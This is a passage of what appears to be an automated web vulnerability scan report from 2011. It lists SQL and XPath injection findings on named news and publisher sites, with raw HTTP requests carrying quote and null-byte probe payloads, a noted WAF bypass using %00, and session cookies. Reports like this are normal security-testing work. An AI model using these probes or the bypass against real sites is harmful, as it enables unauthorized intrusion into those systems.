Cookie: CFID=1230652; CFTOKEN=76495853; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D

Response 1

HTTP/1.1 500 The request has exceeded the allowable time limit Tag: cfoutput
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
server-error: true
Date: Mon, 02 May 2011 22:58:38 GMT
Content-Length: 10083

<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   <html>
   
   <head>
       <title>Unexpected Error</title>
       <style type="tex
...[SNIP]...
<pre>coldfusion.runtime.RequestTimedOutException: The request has exceeded the allowable time limit Tag: cfoutput
   at coldfusion.tagext.io.OutputTag.doStartTag(OutputTag.java:149)
   at cfonError2ecfm215532197$funcONERROR.runFunction(D:\wwwroot\elsevi
...[SNIP]...

Request 2

GET /myarticleservices/booklets/?product_id=4556%2527%2527 HTTP/1.1
Host: webshop.elsevier.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1230652; CFTOKEN=76495853; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D

Response 2

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:58:43 GMT
Content-Length: 20048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...

1.6. http://www.ilsole24ore.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ilsole24ore.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
Host: www.ilsole24ore.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1304392432178-New; s_lastvisit=1304392432179; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:01 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 118698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       
       
               <title>Il Sol
...[SNIP]...
<a class="multi-link" href="http://www.ilsole24ore.com/art/finanza-e-mercati/2011-04-28/asset-tossici-pesano-ancora-215834.shtml?uuid=AaLRGlSD&amp;fromSearch">
...[SNIP]...

1.7. http://www.ilsole24ore.com/s24service [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ilsole24ore.com
Path:   /s24service

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /s24service%00'?profilo=shopping_by_id&search_query_id=basicquery&xsl_id=shopping24&order_by=&page_number=1&page_size=10&max_docs=10&highlight=true&keywords=&search_parameters=cquery___1___%28%28[13]'SH246180868',[12]'SH246209950',[11]'SH246160782',[11]'SH246192328',[10]'SH246189182',[10]'SH246233493',[9]'SH246118832',[8]'SH246130070',[8]'SH246141365',[8]'SH246195618'%29%20%3Cin%3E%20idprodotto%20%29___1___OR HTTP/1.1
Host: www.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/art/notizie/2011-05-02/morte-bin-laden-pakistan-afghanistan-093710.shtml?uuid=AaXmPfTD
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; c=undefinedwww.banchedati.ilsole24ore.comwww.banchedati.ilsole24ore.com; SC_LINKS_SH=%5B%5BB%5D%5D; s_cm_NW=undefinedwww.shopping24.ilsole24ore.comwww.shopping24.ilsole24ore.com; SC_LINKS_VG=%5B%5BB%5D%5D; s_lastvisit=1304398129881; s_cc=true; s_nr=1304398768834-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:09:05 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 118644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       
       
               <title>Il Sol
...[SNIP]...
<a class="multi-link" href="http://www.ilsole24ore.com/art/finanza-e-mercati/2011-04-28/asset-tossici-pesano-ancora-215834.shtml?uuid=AaLRGlSD&amp;fromSearch">
...[SNIP]...

2. XPath injection  previous  next
There are 13 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://www.ansa.it/motori/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /motori/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /motori'/ HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 23:59:38 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.2. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/ansa_banner_array.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web'/banner_js/ansa_banner_array.js HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:00:29 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.3. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/ansa_banner_array.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/banner_js'/ansa_banner_array.js HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:00:30 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.4. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/ansa_banner_array.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/banner_js/ansa_banner_array.js' HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:00:31 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.5. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/msn_banner_array.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web'/banner_js/msn_banner_array.js HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=10143333.1311507310.1304392445.1304392445.1304398726.2; __utmb=10143333; __utmc=10143333; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304420326317:ss=1304420326317

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:02:15 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.6. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/msn_banner_array.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/banner_js'/msn_banner_array.js HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=10143333.1311507310.1304392445.1304392445.1304398726.2; __utmb=10143333; __utmc=10143333; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304420326317:ss=1304420326317

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:02:16 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.7. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/banner_js/msn_banner_array.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/banner_js/msn_banner_array.js' HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/motori/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=10143333.1311507310.1304392445.1304392445.1304398726.2; __utmb=10143333; __utmc=10143333; WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304420326317:ss=1304420326317

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 03 May 2011 00:02:17 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.8. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/images/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web'/images/favicon.ico HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmb=10143333; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:22:24 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.9. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/images/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/images'/favicon.ico HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmb=10143333; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:22:25 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.10. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/images/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/images/favicon.ico' HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=10143333.1311507310.1304392445.1304392445.1304392445.1; __utmb=10143333; __utmc=10143333; __utmz=10143333.1304392445.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1124471968.30145892:lv=1304414045957:ss=1304414045957

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:22:26 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.11. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/notizie/photogallery/hp_photo_index.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web%00'/notizie/photogallery/hp_photo_index.xml?d=1304392412995 HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/web/video/visual.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:15:00 GMT
Content-type: text/html
Content-Length: 128891


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.12. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/notizie/photogallery/hp_photo_index.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/notizie%00'/photogallery/hp_photo_index.xml?d=1304392412995 HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/web/video/visual.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:15:06 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

2.13. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ansa.it
Path:   /web/notizie/photogallery/hp_photo_index.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /web/notizie/photogallery%00'/hp_photo_index.xml?d=1304392412995 HTTP/1.1
Host: www.ansa.it
Proxy-Connection: keep-alive
Referer: http://www.ansa.it/web/video/visual.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 02 May 2011 22:15:11 GMT
Content-Length: 43626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">
<head>
<meta http-equiv="Content
...[SNIP]...
<ul xmlns:fn="http://www.w3.org/2005/02/xpath-functions">
...[SNIP]...

3. HTTP header injection  previous  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

